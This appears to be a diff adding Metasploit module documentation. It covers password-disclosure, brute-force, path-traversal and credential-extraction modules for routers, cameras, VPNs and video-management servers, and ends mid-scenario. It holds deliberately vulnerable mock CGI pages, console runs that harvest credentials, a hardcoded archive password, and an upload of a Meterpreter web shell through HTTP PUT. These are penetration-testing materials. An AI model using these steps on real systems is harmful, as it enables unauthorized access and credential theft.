+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:lm_password ntlm:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C jtr:lm
+creds add user:nt_password ntlm:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C jtr:nt
+```
+
+Crack them:
+
+```
+msf5 > use auxiliary/analyze/jtr_windows_fast 
+msf5 auxiliary(analyze/jtr_windows_fast) > run
+
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-koittz
+[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1v82lkm
+[*] Cracking lm hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+Using default target encoding: CP850
+Warning: poor OpenMP scalability for this hash type, consider --fork=8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 1177Kp/s 1177Kc/s 1177KC/s PLANO..VAGRANT
+Session completed
+[*] Cracking lm hashes in single mode...
+Using default input encoding: UTF-8
+Using default target encoding: CP850
+Warning: poor OpenMP scalability for this hash type, consider --fork=8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:00:02 DONE (2019-02-11 19:34) 0g/s 4634Kp/s 4634Kc/s 4634KC/s WAC1907..E1900
+Session completed
+[*] Cracking lm hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+Using default target encoding: CP850
+Warning: poor OpenMP scalability for this hash type, consider --fork=8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 41152Kp/s 41152Kc/s 41152KC/s 0766269..0769743
+Session completed
+[*] Cracked Passwords this run:
+[+] lm_password:password
+[*] Cracking nt hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking nt hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking nt hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] lm_password:password
+[+] nt_password:password
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_windows_fast) > creds
+Credentials
+===========
+
+host  origin  service  public       private                                                            realm  private_type  JtR Format
+----  ------  -------  ------       -------                                                            -----  ------------  ----------
+                       lm_password  password                                                                  Password      
+                       lm_password  e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+                       nt_password  password                                                                  Password      
+                       nt_password  aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+
+```
@@ -0,0 +1,76 @@
+## Description
+
+C2S DVR allows an unauthenticated user to disclose the username
+& password by requesting the javascript page 'read.cgi?page=2'.
+This may also work on some cameras including IRDOME-II-C2S, IRBOX-II-C2S.
+
+## Vulnerable Application
+
+This module has been verified against the mock vulnerable page listed below.
+
+### Mock Vulnerable Page
+
+These instructions will create a cgi environment and a vulnerable perl application for exploitation.
+Kali rolling (2019.1) was utilized for this tutorial, with apache.
+
+#### Setup
+
+1. Enable cgi: `a2enmod cgid`
+2. `mkdir /var/www/html/cgi-bin`
+3. Enable folder for cgi execution: add `ScriptAlias "/cgi-bin/" "/var/www/html/cgi-bin/"` to `/etc/apache2/sites-enabled/000-default.conf ` inside of the `VirtualHost` tags
+4. Create the vulnerable page by writing the following text to `/var/www/html/cgi-bin/read.cgi`:
+
+```
+#!/usr/bin/perl
+use CGI qw(:standard);
+$query = new CGI;
+print $query->header( -type=> "text/javascript"),
+$query->import_names( 'Q' );
+
+my $data = <<'DATA';
+var pw_enflag = "1";
+var pw_adminpw = "12345";
+var pw_retype1 = "12345";
+var pw_userpw = "56789";
+var pw_retype2 = "56789";
+var pw_autolock = "0";
+DATA
+
+if ($Q::page == 2) {
+  print $data;
+}
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use auxiliary/gather/c2s_dvr_password_disclosure```
+3. ```set rhosts [rhosts]```
+4. ```run```
+
+## Scenarios
+
+### Against the Mock page listed above
+
+  ```
+    resource (c2s.rb)> use auxiliary/gather/c2s_dvr_password_disclosure
+    resource (c2s.rb)> set rhosts 127.0.0.1
+    rhosts => 127.0.0.1
+    resource (c2s.rb)> set verbose true
+    verbose => true
+    resource (c2s.rb)> exploit
+    [*] Attempting to load data from /cgi-bin/read.cgi?page=2
+    [+] Found: admin:12345
+    [+] Found: user:56789
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+    [*] Starting persistent handler(s)...
+    msf5 auxiliary(gather/c2s_dvr_password_disclosure) > creds
+    Credentials
+    ===========
+    
+    host       origin     service        public  private  realm  private_type
+    ----       ------     -------        ------  -------  -----  ------------
+    127.0.0.1  127.0.0.1  80/tcp (http)  admin   12345           Password
+    127.0.0.1  127.0.0.1  80/tcp (http)  user    56789           Password
+  ```
@@ -0,0 +1,124 @@
+## Vulnerable Application
+
+[CVE-2019-1653](https://nvd.nist.gov/vuln/detail/CVE-2019-1653) (aka Cisco Bugtracker ID [CSCvg85922](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info)) is an unauthenticated disclosure of device configuration information for the Cisco RV320/RV325 small business router.  The vulnerability was responsibly disclosed by [RedTeam Pentesting GmbH](https://seclists.org/fulldisclosure/2019/Jan/52).
+
+An exposed remote administration interface (on :443) would allow an attacker to retrieve password hashes and other sensitive device configuration information.  On version `1.4.2.15`, the vulnerabilty is exploitable via the WAN interface on port 8007 (by default) or 443 (if remote administration is enabled), in addition to port 443 on the LAN side.  On version `1.4.2.17`, only LAN port 443 is accessible by default, but user configuration can open port 443 for remote management on the WAN side, making the device vulnerable externally.
+
+More context is available from [Rapid7's blog post](https://blog.rapid7.com/2019/01/29/cisco-r-rv320-rv325-router-unauthenticated-configuration-export-vulnerability-cve-2019-1653-what-you-need-to-know/).
+
+
+## Verification Steps
+
+ 1. Start `msfconsole`
+ 2. `use auxiliary/gather/cisco_rv320_config`
+ 3. `set RHOSTS 192.168.1.1` (default LAN IP) or to the WAN interface
+ 4. `run`
+ 5. Review the downloaded configuration file cited in the output.  For example:
+>```
+>[+] Stored configuration (128658 bytes) to /home/administrator/.msf4/loot/20190206213439_default_192.168.1.1_cisco.rv.config_791561.txt
+>```
+ 6. If the database is connected, review the `hosts`, `creds`, and `loot` commands
+
+## Options
+
+*SSL*: Should be set to 'true' for port 443 and set to 'false' for port 80 or port 8007.
+
+*TARGETURI*: Should point to the `/cgi-bin/config.exp` endpoint and likely should never be changed.
+
+## Scenarios
+
+#### Against firmware version 1.4.2.15, on the LAN interface, port 443:
+
+```
+msf5 >
+msf5 > use auxiliary/gather/cisco_rv320_config
+msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1
+RHOSTS => 192.168.1.1
+msf5 auxiliary(gather/cisco_rv320_config) > run
+
+[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+#### Against firmware version 1.4.2.15, on the WAN interface, port 8007:
+
+```
+msf5 >
+msf5 > use auxiliary/gather/cisco_rv320_config
+msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 203.0.113.54
+RHOSTS => 203.0.113.54
+msf5 auxiliary(gather/cisco_rv320_config) > set RPORT 8007
+RPORT => 8007
+msf5 auxiliary(gather/cisco_rv320_config) > set SSL false
+SSL => false
+msf5 auxiliary(gather/cisco_rv320_config) > run
+
+[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_203.0.113.54_cisco.rv.config_434637.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+#### Against firmware version 1.4.2.17, on the LAN interface, port 443:
+
+```
+msf5 >
+msf5 > use auxiliary/gather/cisco_rv320_config
+msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1
+RHOSTS => 192.168.1.1
+msf5 auxiliary(gather/cisco_rv320_config) > run
+
+[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+#### Against newer firmware (>= 1.4.2.19), on the LAN interface, port 443:
+
+```
+msf5 >
+msf5 > use auxiliary/gather/cisco_rv320_config
+msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1
+RHOSTS => 192.168.1.1
+msf5 auxiliary(gather/cisco_rv320_config) > run
+
+[-] Auxiliary aborted due to failure: not-vulnerable: Response suggests device is patched
+[*] Auxiliary module execution completed
+```
+
+#### If module succeeds, check the database:
+
+```
+msf5 auxiliary(gather/cisco_rv320_config) > hosts
+
+Hosts
+=====
+
+address      mac                name          os_name  os_flavor  os_sp  purpose  info  comments
+-------      ---                ----          -------  ---------  -----  -------  ----  --------
+203.0.113.54 70:E4:22:94:E7:20  router94e720  Cisco    RV320                            
+192.168.1.1  70:E4:22:94:E7:20  router94e720  Cisco    RV320                            
+```
+
+```
+msf5 auxiliary(gather/cisco_rv320_config) > creds
+Credentials
+===========
+
+host         origin       service          public  private                            realm  private_type
+----         ------       -------          ------  -------                            -----  ------------
+203.0.113.54 192.168.1.1  8007/tcp (http)  cisco   $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/         Nonreplayable hash
+192.168.1.1  192.168.1.1  443/tcp (https)  cisco   $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/         Nonreplayable hash
+```
+
+```
+msf5 auxiliary(gather/cisco_rv320_config) > loot
+
+Loot
+====
+
+host         service  type             name  content     info  path
+----         -------  ----             ----  -------     ----  ----
+203.0.113.54          cisco.rv.config        text/plain        /home/administrator/.msf4/loot/20190206213439_default_203.0.113.54_cisco.rv.config_791561.txt
+192.168.1.1           cisco.rv.config        text/plain        /home/administrator/.msf4/loot/20190206211312_default_192.168.1.1_cisco.rv.config_412095.txt
+```
@@ -0,0 +1,66 @@
+## Description
+
+This module performs unauthenticated requests to retrieve masthead, sites, and packages information from IBM BigFix Relay Servers. If the **DOWNLOAD** option is set then the module will attempt to download the identified packages. This module has been tested against Relay Server 9.5.10.79.
+
+## Vulnerable Application
+
+BigFix Platform 9.2 - 9.2.16 and 9.5 - 9.5.11
+
+## Options
+
+**SHOW_MASTHEAD**
+
+Default: true. Read Organization name from `/masthead/masthead.axfm`
+
+**SHOW_PACKAGES**
+
+Default true. Read Action values and packages names from `/cgi-bin/bfenterprise/BESMirrorRequest.exe`
+
+**SHOW_SITES**
+
+Default true. Read Site URLs from `/cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands`
+
+**DOWNLOAD**
+
+Default true. Attempt to download identified packages.
+
+**ShowURL**
+
+Default false. Show full URL for the packages instead of the filename.
+
+## Verification Steps
+
+1. `./msfconsole -q`
+2. `use auxiliary/gather/ibm_bigfix_sites_packages_enum`
+3. `set rhosts <rhost>`
+4. `exploit`
+
+## Scenarios
+
+### Relay Version 9.5.10.79
+
+```
+msf5 > use auxiliary/gather/ibm_bigfix_sites_packages_enum
+msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) > set rhosts <rhost>
+rhosts => <rhost>
+msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) > exploit
+[*] Running module against [IP]
+
+[+] [Organization]
+[+] http://[hostname]:52311/cgi-bin/bfgather.exe/actionsite
+[+] http://[hostname]:52311/cgi-bin/bfenterprise/PostResults.exe
+<snip>
+[*] Sites
+[+] http://[hostname]:52311/cgi-bin/bfgather.exe/[site]
+[+] http://[hostname]:52311/cgi-bin/bfgather.exe/[site]
+[+] http://[hostname]:52311/cgi-bin/bfgather.exe/[site]
+<snip>
+[*] Packages
+[*] Action: [action number]
+[+] File: [package name]
+[*] Action: [action number]
+[+] File: [package name]
+<snip>
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) >
+```
@@ -0,0 +1,62 @@
+## Description
+
+  SIEMENS IP-Camera (CVMS2025-IR + CCMS2025), JVC IP-Camera (VN-T216VPRU),
+  and Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR)
+  allow an unauthenticated user to disclose the username & password by
+  requesting the javascript page 'readfile.cgi?query=ADMINID'.
+  Siemens firmwares affected: x.2.2.1798, CxMS2025_V2458_SP1, x.2.2.1798, x.2.2.1235
+
+## Vulnerable Application
+
+This module has been verified against the mock vulnerable page listed below.
+
+### Mock Vulnerable Page
+
+These instructions will create a cgi environment and a vulnerable perl application for exploitation.
+Kali rolling (2019.1) was utilized for this tutorial, with apache.
+
+#### Setup
+
+1. Enable cgi: `a2enmod cgid`
+2. `mkdir /var/www/html/cgi-bin`
+3. Enable folder for cgi execution: add `ScriptAlias "/cgi-bin/" "/var/www/html/cgi-bin/"` to `/etc/apache2/sites-enabled/000-default.conf ` inside of the `VirtualHost` tags
+4. Create the vulnerable page by writing the following text to `/var/www/html/cgi-bin/readfile.cgi`:
+
+```
+#!/usr/bin/perl
+use CGI qw(:standard);
+$query = new CGI;
+print $query->header( -type=> "text/javascript"),
+$query->import_names( 'Q' );
+my $data = <<'DATA';
+var Adm_ID="admin";
+var Adm_Pass1="password";
+var Language="en";
+var Logoff_Time="0";
+DATA
+if ($Q::query == "ADMINID") {
+  print $data;
+}
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use auxiliary/gather/ipcamera_password_disclosure```
+3. ```set rhosts [rhosts]```
+4. ```run```
+
+## Scenarios
+
+### Against the Mock page listed above
+
+  ```
+  msf5 > use auxiliary/gather/ipcamera_password_disclosure 
+  msf5 auxiliary(gather/ipcamera_password_disclosure) > set rhosts 127.0.0.1
+  rhosts => 127.0.0.1
+  msf5 auxiliary(gather/ipcamera_password_disclosure) > run
+  
+  [+] Found: admin:password
+  [*] Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```
@@ -0,0 +1,81 @@
+## Description
+
+Nuuo CMS Session Bruteforce
+
+The NUUO CMS protocol uses session tokens in a similar way to HTTP cookies. As mentioned in the summary, if a USERLOGIN request is sent with a correct username and password, a "User-Session-No" token will be returned. The number returned is composed of 8 digits, so if an attacker wanted to guess it, they would have 10 million possibilities, and would be able to bruteforce it on average after 5 million tries.
+
+The function responsible for creating a new user is at offset 0x454E80 in CMS_Server.exe version 2.1. It sets up a new user object and returns the session token to the calling function. This function has what is probably a coding error - the number returned is actually not a number, but the heap address of the user object created by invoking "new()" in the user object class. An assembly snippet is shown below:
+
+```
+.text:00454E80 000                 push    0FFFFFFFFh
+.text:00454E82 004                 push    offset loc_5E2013
+.text:00454E87 008                 mov     eax, large fs:0
+.text:00454E8D 008                 push    eax
+.text:00454E8E 00C                 sub     esp, 8    
+.text:00454E91 014                 push    ebp
+.text:00454E92 018                 push    esi
+.text:00454E93 01C                 push    edi
+.text:00454E94 020                 mov     eax, dword_68D134
+.text:00454E99 020                 xor     eax, esp   
+.text:00454E9B 020                 push    eax
+.text:00454E9C 024                 lea     eax, [esp+24h+var_C]
+.text:00454EA0 024                 mov     large fs:0, eax
+.text:00454EA6 024                 mov     ebp, ecx
+.text:00454EA8 024                 lea     edi, [ebp+43Ch] 
+.text:00454EAE 024                 push    edi             ; lpCriticalSection_EnterCriticalSection
+.text:00454EAF 028                 mov     [esp+28h+var_10], edi
+.text:00454EB3 028                 call    ds:EnterCriticalSection
+.text:00454EB9 024                 push    1B8h            ; unsigned int
+.text:00454EBE 028                 mov     [esp+28h+var_4], 0
+.text:00454EC6 028                 call    ??2@YAPAXI@Z    ; new() operator, returns object in eax
+(...)
+```
+
+After the call to ??2@YAPAXI@Z in .text:00454EC6, the session number is returned to the calling function (sub_457100), which then stores it and sends it back to the client as the valid session number:
+
+```
+NUCM/1.0 200 OK
+User-Valid: %d
+Server-Version: %s
+Ini-Version: %d
+License-Number: %d
+User-Session-No: %u <---- session number, which is a hexadecimal memory address converted to decimal
+```
+
+These session numbers (tokens) are not that easy to predict, however after collecting thousands of samples I was able to build a table of the most common occurrences, which reduces the possibilities from 10 million to about 1.2 million. In practice, the tokens can usually be guessed between in less than 500,000 attempts - an improvement of 95% over standard bruteforcing. It is likely this can be further improved with some deeper analysis, but due to time constraints this was not investigated further. The tables used to do the bruteforcing are in Appendix #C.
+
+This attack is perfectly feasible despite the high number of attempts needed. Firstly, there is no bruteforce protection on the CMS server, so we can just flood it with requests and find the session number in less than an hour. 
+Secondly, due to the nature of this application, it is normal to have the software clients logged in for a long amount of time (days, weeks) in order to monitor the video cameras controlled by CMS.
+
+It is worth noticing that when a user logs in, the session has to be maintained by periodically sending a PING request. To bruteforce the session, we send each guess with a PING request until a 200 OK message is received. 
+
+## Vulnerable Application
+
+[NUUO Central Management Server (CMS): all versions below 2.4.0](d1.nuuo.com/NUUO/CMS/)
+
+ - 1.5.2 OK
+ - 2.1.0 OK
+ - 2.3.0 OK
+
+## Scenarios
+
+### Tested on Windows 10 Pro x64 running NCS Server v2.1.0
+
+```
+msf5 auxiliary(gather/nuuo_cms_bruteforce) > set rhosts 172.22.222.200
+rhosts => 172.22.222.200
+msf5 auxiliary(gather/nuuo_cms_bruteforce) > exploit
+
+[*] 172.22.222.200:5180 - Bruteforcing session - this might take a while, go get some coffee!
+[*] 172.22.222.200:5180 - Generating 2621440 session tokens
+[+] 172.22.222.200:5180 - Found valid user session: 42094216
+[*] 172.22.222.200:5180 - Time taken: 1384.588721601991 seconds; total tries 590893
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/nuuo_cms_bruteforce) >
+```
+
+## References
+
+https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
+
+https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
@@ -0,0 +1,71 @@
+## Description
+
+Nuuo CMS Authenticated Arbitrary File Download
+
+The GETCONFIG verb is used by a CMS client to obtain configuration files and other resources from the CMS server. An example request is below:
+
+```
+GETCONFIG NUCM/1.0
+FileName: <filename>
+FileType: <number>
+User-Session-No: <session-number>
+```
+
+The FileType determines the directory where the file will be downloaded from. "FileType: 0" will download from the base installation directory (CMS_DIR), while "FileType: 1" will download from "<CMS_DIR>\Images\Map\". There are other defined FileType integers, but these have not been investigated in detail.
+
+The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) characters. Therefore, this function can be abused to obtain any files off the file system, including:
+
+- CMServer.cfg, a file zipped with the password "NUCMS2007!" that contains the usernames and passwords of all the system users (enabling a less privileged user to obtain the administrator's password)
+- ServerConfig.cfg, another file zipped with the password "NUCMS2007!" that contains the SQL Server "sa" password as well the FTP server username and password
+- Any other sensitive files in the drive where CMS Server is installed.
+
+This module works in the following way:
+
+- if a SESSION number is present, uses that to login
+- if not, tries to authenticate with USERNAME and PASSWORD
+
+Due to the lack of ZIP encryption support in Metasploit, the module prints a warning indicating that the archive cannot be unzipped in Msf.
+
+## Vulnerable Application
+
+[NUUO Central Management Server (CMS): all versions up to and including 3.5.0](http://d1.nuuo.com/NUUO/CMS/)
+
+The following versions were tested:
+
+ - 1.5.2 OK
+ - 2.1.0 OK
+ - 2.3.2 OK
+ - 2.4.0 OK
+ - 2.6.0 OK
+ - 2.9.0 OK
+ - 2.10.0 OK
+ - 3.1 OK
+ - 3.3 OK
+ - 3.5 OK
+
+## Scenarios
+
+### Tested on Windows 10 Pro x64 running NCS Server 2.4.0
+
+```
+msf5 auxiliary(gather/nuuo_cms_file_download) > set rhosts 172.22.222.200
+rhosts => 172.22.222.200
+msf5 auxiliary(gather/nuuo_cms_file_download) > exploit
+
+[+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_CMServer.cfg_227185.cfg
+[+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_ServerConfig.cfg_050084.cfg
+[*] 172.22.222.200:5180 - The user and server configuration files were stored in the loot database.
+[*] 172.22.222.200:5180 - The files are ZIP encrypted, and due to the lack of the archive/zip gem,
+[*] 172.22.222.200:5180 - they cannot be decrypted in Metasploit.
+[*] 172.22.222.200:5180 - You will need to open them up with zip or a similar utility, and use the
+[*] 172.22.222.200:5180 - password NUCMS2007! to unzip them.
+[*] 172.22.222.200:5180 - Annoy the Metasploit developers until this gets fixed!
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/nuuo_cms_file_download) >
+```
+
+## References
+
+- https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
+
+- https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
@@ -0,0 +1,54 @@
+## Description
+
+This module will connect to a provided range of web severs and determine if directory listings are enabled on them.
+
+## Vulnerable Application
+
+This module has been verified against the web server listed below.
+
+### Mock Vulnerable Server
+
+These instructions will create a web sever using `apache` with directory listing vulnerability enabled on it.
+
+#### Setup
+
+1. Create the `.htaccess` file with the vulnerable configuration: `echo 'Options +Indexes' > /var/www/html/.htaccess`
+2. Start the apache server `service apache2 start`.
+
+#### Note 
+
+Make sure you dont have an `index.html` file in your `/var/www/html` for the vulnerability to work.
+
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/dir_listing```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set THREADS [number of threads]```
+4. Do: ```run```
+
+## Scenarios
+
+### Against the Mock server listed above
+
+```
+msf > use auxiliary/scanner/http/dir_listing
+msf auxiliary(scanner/http/dir_listing) > set RHOSTS 1.1.1.10-14
+RHOSTS => 1.1.1.10-14
+msf auxiliary(scanner/http/dir_listing) > set THREADS 4
+THREADS => 4
+msf auxiliary(scanner/http/dir_listing) > set verbose true
+verbose => true
+msf auxiliary(scanner/http/dir_listing) > run
+
+[-] The connection was refused by the remote host (1.1.1.13:80).
+[*] NOT Vulnerable to directory listing http://1.1.1.13:80/
+[-] The connection was refused by the remote host (1.1.1.12:80).
+[*] NOT Vulnerable to directory listing http://1.1.1.12:80/
+[*] NOT Vulnerable to directory listing http://1.1.1.11:80/
+[*] Scanned 3 of 4 hosts (75% complete)
+[+] Found Directory Listing http://1.1.1.14:80/
+[*] Scanned 4 of 4 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/dir_listing) >
+```
@@ -0,0 +1,40 @@
+This module tests credentials on Fortinet SSL VPN servers (FortiGate).
+
+NOTE: This module is only executing when Fortinet SSL VPN Server is detected.
+When the server cannot be verified the module stops working.
+The realm/domain is used for every request when set.
+
+The module supports IPv6 requests.
+The module supports several hosts at the same time.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/fortinet_ssl_vpn```
+2. Do: ```set RHOSTS [IP]```
+3. Configure a user and password list by setting either `USERNAME`, `PASSWORD`, `USER_FILE`, or `PASS_FILE`.
+4. Do: ```run```
+
+## Scenarios
+
+IP-Addresses have been masked with x
+
+```
+msf5 auxiliary(scanner/http/fortinet_ssl_vpn) > run
+
+[+] xxxx:xxxx:xxxx:xxxx::4:443 - Server is responsive...
+[+] xxxx:xxxx:xxxx:xxxx::4:443 - Application appears to be Fortinet SSL VPN. Module will continue.
+[*] xxxx:xxxx:xxxx:xxxx::4:443 - Starting login brute force...
+[*] xxxx:xxxx:xxxx:xxxx::4:443 - [1/1] - Trying username:"testuser" with password:"superpass"
+[+] SUCCESSFUL LOGIN - "testuser":"superpass"
+[!] No active DB -- Credential data will not be saved!
+[*] Scanned 1 of 2 hosts (50% complete)
+[+] xxx.xxx.xxx.xxx:443 - [1/1] - Server is responsive...
+[+] xxx.xxx.xxx.xxx:443 - [1/1] - Application appears to be Fortinet SSL VPN. Module will continue.
+[*] xxx.xxx.xxx.xxx:443 - [1/1] - Starting login brute force...
+[*] xxx.xxx.xxx.xxx:443 - [1/1] - Trying username:"testuser" with password:"superpass"
+[+] SUCCESSFUL LOGIN - "testuser":"superpass"
+[!] No active DB -- Credential data will not be saved!
+[*] Scanned 2 of 2 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+```
@@ -0,0 +1,60 @@
+## Description 
+This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/http_put```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```set PATH [PATH]```
+5. Do: ```set FILENAME [FILNAME]```
+6. Do: ```set FILEDATA [PATH]```
+7. Do: ```run```
+
+## Options 
+
+### ACTION
+
+Set `ACTION` to either `PUT` or `DELETE`. (Default: `PUT`)
+
+**PUT**
+
+Action is set to PUT to upload files to the server. If `FILENAME` isn't specified, the module will generate a random string as a .txt file.
+
+**DELETE** 
+
+Deletes the file specified in the `FILENAME` option (Default: `msf_http_put_test.txt`). `FILENAME` is required when Action is set to DELETE. 
+
+### PATH
+
+The path at which this module will attempt to either PUT the content or DELETE it.
+
+### FILEDATA
+
+The content to put in the uploaded file when `ACTION` is set to `PUT`.
+
+
+## Scenarios
+
+Here `ACTION` is by default set to `PUT`.
+
+```
+msf > use auxiliary/scanner/http/http_put
+msf auxiliary(scanner/http/http_put) > set RHOSTS 1.1.1.23
+RHOSTS => 1.1.1.23
+msf auxiliary(scanner/http/http_put) > set RPORT 8585
+RPORT => 8585
+msf auxiliary(scanner/http/http_put) > set PATH /uploads
+PATH => /uploads
+msf auxiliary(scanner/http/http_put) > set FILENAME meterpreter.php
+FILENAME => meterpreter.php
+msf auxiliary(scanner/http/http_put) > set FILEDATA file://root/Desktop/meterpreter.php
+FILEDATA => file://root/Desktop/meterpreter.php
+msf auxiliary(scanner/http/http_put) > run 
+
+[+] File uploaded: http://1.1.1.23:8585/uploads/meterpreter.php
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/http_put) >
+```
+ 
@@ -0,0 +1,20 @@
+## Description
+
+  This module scans a JBoss instance for a few vulnerabilities.
+
+## Vulnerable Software
+
+  The JBoss Enterprise Application Platform (or JBoss EAP) is a
+  subscription-based/open-source Java EE-based application
+  server runtime platform used for building, deploying, and
+  hosting highly-transactional Java applications and services
+
+  This module has been successfully tested on:
+
+  * Apache-Coyote/1.1 ( Powered by Servlet 2.4; JBoss-4.2.0.GA (build: SVNTag=JBoss_4_2_0_GA date=200705111440)/Tomcat-5.5 )
+
+## Verification Steps
+
+  1. Do: ```use auxiliary/scanner/http/jboss_vulnscan```
+  2. Do: ```set RHOSTS [IP]```
+  3. Do: ```run```
@@ -0,0 +1,62 @@
+## Decription
+
+  This module extracts usernames and salted MD5 password hashes
+  from ManageEngine DeviceExpert version 5.9 build 5980 and prior.
+
+
+## Vulnerable Software
+
+  [DeviceExpert](http://www.manageengine.com/products/device-expert) is a
+  web–based, multi-vendor network configuration and change management (NCCM)
+  solution for switches, routers, firewalls and other network devices.
+
+  This module has been tested successfully on DeviceExpert
+  version 5.9.7 build 5970 on Windows XP SP3.
+
+  Software download:
+
+  * [5.8 build 5850](http://web.archive.org/web/20130123070454/http://www.manageengine.com/products/device-expert/download.html)
+  * [5.9 build 5900](http://web.archive.org/web/20130304043822/http://www.manageengine.com/products/device-expert/download.html)
+  * [5.9 build 5950](http://web.archive.org/web/20131029082827/http://www.manageengine.com/products/device-expert/download.html)
+
+
+## Verification Steps
+
+  1. Do: ```use auxiliary/scanner/http/manageengine_deviceexpert_user_creds```
+  2. Do: ```set RHOSTS [IP]```
+  3. Do: ```run```
+  4. You should receive usernames and associated password hashes + salts
+
+
+## Scenarios
+
+  ```
+  msf5 > use auxiliary/scanner/http/manageengine_deviceexpert_user_creds 
+  msf5 auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > set rhosts 172.16.158.131
+  rhosts => 172.16.158.131
